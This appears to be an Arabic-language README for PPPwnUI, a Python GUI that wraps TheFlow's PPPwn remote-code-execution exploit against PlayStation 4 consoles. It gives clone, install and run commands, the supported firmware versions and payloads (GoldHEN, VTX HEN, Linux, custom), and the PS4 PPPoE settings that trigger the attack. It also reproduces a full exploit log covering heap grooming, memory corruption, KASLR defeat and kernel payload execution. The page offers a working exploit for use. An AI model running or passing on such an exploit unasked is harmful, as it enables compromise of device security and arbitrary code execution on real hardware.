PPPwnUI هو برنامج تم إنشاؤه في Python ويضيف واجهة مستخدم إلى استغلال PPPwn الذي أنشأه TheFlow.
git clone https://github.com/B-Dem/PPPwnUI
pip install -r requirements.txt
قم بتشغيل التطبيق باستخدام
ويندوز :
PPPwnUI.bat
لينكس :
chmod +x PPPwnUI.sh
ثم :
./PPPwnUI.sh
حدد الواجهة الخاصة بك باستخدام القائمة المنسدلة
اختر بين إصدار الاستغلال الذي تريد استخدامه (PPPwn Python، PPPwn_Go)
اختر حمولتك بين:
PPPwn : (متاح لـ: 7.00، 7.01، 7.02، 7.50، 7.51، 7.55، 8.00، 8.01، 8.03، 8.50، 8.52، 9.00، 9.03، 9.04، 9.50، 9.51، 9.60، 10.00، .01، 10.50، 10.70، 10.71 و 11.00)
حمولات PPPwn Goldhen : (متاحة لـ: 9.00، 9.60، 10.00، 10.01 و11.00)
VTX HEN : (متوفر لـ: 7.55، 8.00، 8.03، 8.50، 8.52، 9.00، 9.03، 9.04، 10.00، 10.01 10.50، 10.70، 10.71 و 11.00)
حمولات PPPwn Linux : (متاح لـ: 11.00)
الحمولات المخصصة : (الحمولات المخصصة الخاصة بك)
ثم انقر فوق Start PPPwn لبدء الاستغلال.
على جهاز PS4 الخاص بك:
Settings
ثم Network
Set Up Internet connection
واختر Use a LAN Cable
Custom
واختر PPPoE
IP Address Settings
PPPoE User ID
وكلمة PPPoE Pasword
Automatic
DNS Settings
MTU Settings
Do Not Use
Proxy Server
Test Internet Connection
للتواصل مع جهاز الكمبيوتر الخاص بك إذا فشل الاستغلال أو تعطل جهاز PS4، فيمكنك تخطي إعداد الإنترنت والنقر ببساطة على Test Internet Connection
. إذا فشل البرنامج النصي أو كان عالقًا في انتظار طلب/استجابة، فقم بإحباطه وتشغيله مرة أخرى على جهاز الكمبيوتر الخاص بك، ثم انقر فوق Test Internet Connection
على جهاز PS4 الخاص بك.
على جهاز الكمبيوتر الخاص بك:
goldhen.bin
إلى الدليل الجذر لجهاز exfat/fat32 USB وأدخله في جهاز PS4 الخاص بك. [+] PPPwn - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=enp0s3 fw=1100 stage1=stage1/stage1.bin stage2=stage2/stage2.bin
[+] Using PPPwnUI By Memz !
[+] STAGE 0: Initialization
[ * ] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 07:ba:be:34:d6:ab
[+] AC cookie length: 0x4e0
[ * ] Sending PADO...
[ * ] Waiting for PADR...
[ * ] Sending PADS...
[ * ] Waiting for LCP configure request...
[ * ] Sending LCP configure ACK...
[ * ] Sending LCP configure request...
[ * ] Waiting for LCP configure ACK...
[ * ] Waiting for IPCP configure request...
[ * ] Sending IPCP configure NAK...
[ * ] Waiting for IPCP configure request...
[ * ] Sending IPCP configure ACK...
[ * ] Sending IPCP configure request...
[ * ] Waiting for IPCP configure ACK...
[ * ] Waiting for interface to be ready...
[+] Target IPv6: fe80::2d9:d1ff:febc:83e4
[+] Heap grooming...done
[+] STAGE 1: Memory corruption
[+] Pinning to CPU 0...done
[ * ] Sending malicious LCP configure request...
[ * ] Waiting for LCP configure request...
[ * ] Sending LCP configure ACK...
[ * ] Sending LCP configure request...
[ * ] Waiting for LCP configure ACK...
[ * ] Waiting for IPCP configure request...
[ * ] Sending IPCP configure NAK...
[ * ] Waiting for IPCP configure request...
[ * ] Sending IPCP configure ACK...
[ * ] Sending IPCP configure request...
[ * ] Waiting for IPCP configure ACK...
[+] Scanning for corrupted object...found fe80::0fdf:4141:4141:4141
[+] STAGE 2: KASLR defeat
[ * ] Defeating KASLR...
[+] pppoe_softc_list: 0xffffffff884de578
[+] kaslr_offset: 0x3ffc000
[+] STAGE 3: Remote code execution
[ * ] Sending LCP terminate request...
[ * ] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 97:df:ea:86:ff:ff
[+] AC cookie length: 0x511
[ * ] Sending PADO...
[ * ] Waiting for PADR...
[ * ] Sending PADS...
[ * ] Triggering code execution...
[ * ] Waiting for stage1 to resume...
[ * ] Sending PADT...
[ * ] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634be9200
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] AC cookie length: 0x0
[ * ] Sending PADO...
[ * ] Waiting for PADR...
[ * ] Sending PADS...
[ * ] Waiting for LCP configure request...
[ * ] Sending LCP configure ACK...
[ * ] Sending LCP configure request...
[ * ] Waiting for LCP configure ACK...
[ * ] Waiting for IPCP configure request...
[ * ] Sending IPCP configure NAK...
[ * ] Waiting for IPCP configure request...
[ * ] Sending IPCP configure ACK...
[ * ] Sending IPCP configure request...
[ * ] Waiting for IPCP configure ACK...
[+] STAGE 4: Arbitrary payload execution
[ * ] Sending stage2 payload...
[+] Done !
تم إنشاء هذا البرنامج في الأصل باستخدام ❤️ بواسطة Memz for Sighya.
إذا وجدت هذا البرنامج مفيدًا، فاترك نجمة على الريبو!
وإذا كان لديك أي ردود فعل، فتح القضايا!